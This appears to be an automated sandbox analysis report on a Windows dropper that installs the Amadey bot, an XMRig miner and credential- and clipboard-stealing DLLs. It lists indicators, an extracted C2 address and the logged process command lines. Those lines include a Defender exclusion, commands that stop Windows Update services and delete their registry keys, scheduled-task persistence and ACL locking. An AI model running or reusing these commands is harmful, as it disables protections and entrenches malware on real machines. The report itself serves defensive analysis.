Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2023 14:13
Static task
static1
General
-
Target
24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe
-
Size
4.3MB
-
MD5
2546be1f997c39b02143a5908ac7bec9
-
SHA1
7b6c80b8b0288ec37430a8c5662c1f92dd46f11d
-
SHA256
24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2
-
SHA512
016a5fc1a01b4e35cbf7873d2aba6e8801551ed1d9764b35ea383def83e60b50ae779814c51981d55c9b098c5d33933e360a0752e3855ed9c64e790ba388d179
-
SSDEEP
98304:biv+VRRT1/DK/ff7HTK9sPxVV22fYe17DFFyGA4KhX:bi0P1/+/f7TK9sPxVI2N17DFFyGLOX
Malware Config
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 2460 created 3244 2460 XandETC.exe Explorer.EXE PID 2460 created 3244 2460 XandETC.exe Explorer.EXE PID 2460 created 3244 2460 XandETC.exe Explorer.EXE PID 2460 created 3244 2460 XandETC.exe Explorer.EXE PID 2460 created 3244 2460 XandETC.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE PID 4832 created 3244 4832 conhost.exe Explorer.EXE PID 556 created 3244 556 updater.exe Explorer.EXE -
XMRig Miner payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/644-330-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-333-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-334-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-336-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-340-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-343-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig behavioral1/memory/644-345-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp xmrig -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
nbveek.exe24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exePlayer3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation Player3.exe -
Executes dropped EXE 8 IoCs
Processes:
Player3.exess31.exeXandETC.exenbveek.exenbveek.exeupdater.exenbveek.exenbveek.exepid process 2852 Player3.exe 636 ss31.exe 2460 XandETC.exe 732 nbveek.exe 2892 nbveek.exe 556 updater.exe 3608 nbveek.exe 2148 nbveek.exe -
Loads dropped DLL 3 IoCs
Processes:
rundll32.exerundll32.exerundll32.exepid process 3932 rundll32.exe 2932 rundll32.exe 3660 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/644-330-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-333-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-334-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-336-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-340-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-343-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx behavioral1/memory/644-345-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 556 set thread context of 4832 556 updater.exe conhost.exe PID 556 set thread context of 644 556 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
XandETC.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1076 sc.exe 3736 sc.exe 3108 sc.exe 1436 sc.exe 1656 sc.exe 4196 sc.exe 2212 sc.exe 3708 sc.exe 812 sc.exe 3036 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1136 2932 WerFault.exe rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
XandETC.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.execonhost.exepid process 2460 XandETC.exe 2460 XandETC.exe 2832 powershell.exe 2832 powershell.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 2460 XandETC.exe 1792 powershell.exe 1792 powershell.exe 2460 XandETC.exe 2460 XandETC.exe 1664 powershell.exe 1664 powershell.exe 556 updater.exe 556 updater.exe 4416 powershell.exe 4416 powershell.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 3208 powershell.exe 3208 powershell.exe 556 updater.exe 556 updater.exe 556 updater.exe 556 updater.exe 4832 conhost.exe 4832 conhost.exe 556 updater.exe 556 updater.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe 644 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2832 powershell.exe Token: SeShutdownPrivilege 2312 powercfg.exe Token: SeCreatePagefilePrivilege 2312 powercfg.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeShutdownPrivilege 3476 powercfg.exe Token: SeCreatePagefilePrivilege 3476 powercfg.exe Token: SeShutdownPrivilege 552 powercfg.exe Token: SeCreatePagefilePrivilege 552 powercfg.exe Token: SeShutdownPrivilege 516 powercfg.exe Token: SeCreatePagefilePrivilege 516 powercfg.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeSystemEnvironmentPrivilege 1792 powershell.exe Token: SeRemoteShutdownPrivilege 1792 powershell.exe Token: SeUndockPrivilege 1792 powershell.exe Token: SeManageVolumePrivilege 1792 powershell.exe Token: 33 1792 powershell.exe Token: 34 1792 powershell.exe Token: 35 1792 powershell.exe Token: 36 1792 powershell.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeSystemEnvironmentPrivilege 1792 powershell.exe Token: SeRemoteShutdownPrivilege 1792 powershell.exe Token: SeUndockPrivilege 1792 powershell.exe Token: SeManageVolumePrivilege 1792 powershell.exe Token: 33 1792 powershell.exe Token: 34 1792 powershell.exe Token: 35 1792 powershell.exe Token: 36 1792 powershell.exe Token: SeIncreaseQuotaPrivilege 1792 powershell.exe Token: SeSecurityPrivilege 1792 powershell.exe Token: SeTakeOwnershipPrivilege 1792 powershell.exe Token: SeLoadDriverPrivilege 1792 powershell.exe Token: SeSystemProfilePrivilege 1792 powershell.exe Token: SeSystemtimePrivilege 1792 powershell.exe Token: SeProfSingleProcessPrivilege 1792 powershell.exe Token: SeIncBasePriorityPrivilege 1792 powershell.exe Token: SeCreatePagefilePrivilege 1792 powershell.exe Token: SeBackupPrivilege 1792 powershell.exe Token: SeRestorePrivilege 1792 powershell.exe Token: SeShutdownPrivilege 1792 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exePlayer3.exenbveek.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 2852 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe Player3.exe PID 4772 wrote to memory of 636 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe ss31.exe PID 4772 wrote to memory of 636 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe ss31.exe PID 4772 wrote to memory of 2460 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe XandETC.exe PID 4772 wrote to memory of 2460 4772 24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe XandETC.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 2852 wrote to memory of 732 2852 Player3.exe nbveek.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 5100 732 nbveek.exe schtasks.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 732 wrote to memory of 1404 732 nbveek.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 228 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2876 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 2392 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 4972 1404 cmd.exe cmd.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1864 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 1404 wrote to memory of 1592 1404 cmd.exe cacls.exe PID 2068 wrote to memory of 2312 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 2312 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 4196 2888 cmd.exe sc.exe PID 2888 wrote to memory of 4196 2888 cmd.exe sc.exe PID 2068 wrote to memory of 3476 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 3476 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 2212 2888 cmd.exe sc.exe PID 2888 wrote to memory of 2212 2888 cmd.exe sc.exe PID 2068 wrote to memory of 552 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 552 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 516 2068 cmd.exe powercfg.exe PID 2068 wrote to memory of 516 2068 cmd.exe powercfg.exe PID 2888 wrote to memory of 1076 2888 cmd.exe sc.exe PID 2888 wrote to memory of 1076 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3736 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3736 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3108 2888 cmd.exe sc.exe PID 2888 wrote to memory of 3108 2888 cmd.exe sc.exe PID 2888 wrote to memory of 1088 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1088 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4356 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4356 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1428 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1428 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4580 2888 cmd.exe reg.exe PID 2888 wrote to memory of 4580 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1264 2888 cmd.exe reg.exe PID 2888 wrote to memory of 1264 2888 cmd.exe reg.exe PID 1664 wrote to memory of 1848 1664 powershell.exe schtasks.exe PID 1664 wrote to memory of 1848 1664 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe"C:\Users\Admin\AppData\Local\Temp\24e2f026cb22f7dd672b369b91c75847d66976c787142599a2ed8669f1666ed2.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\Player3.exe"C:\Users\Admin\AppData\Local\Temp\Player3.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F5⤵
- Creates scheduled task(s)
PID:5100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:228
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"6⤵PID:2876
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E6⤵PID:2392
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:4972
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"6⤵PID:1864
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E6⤵PID:1592
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
PID:3932 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
PID:2932 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2932 -s 6447⤵
- Program crash
PID:1136 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main5⤵
- Loads dropped DLL
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
PID:636 -
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4196 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2212 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1076 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3736 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3108 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1088
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4356
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1428 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:4580
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1264
-
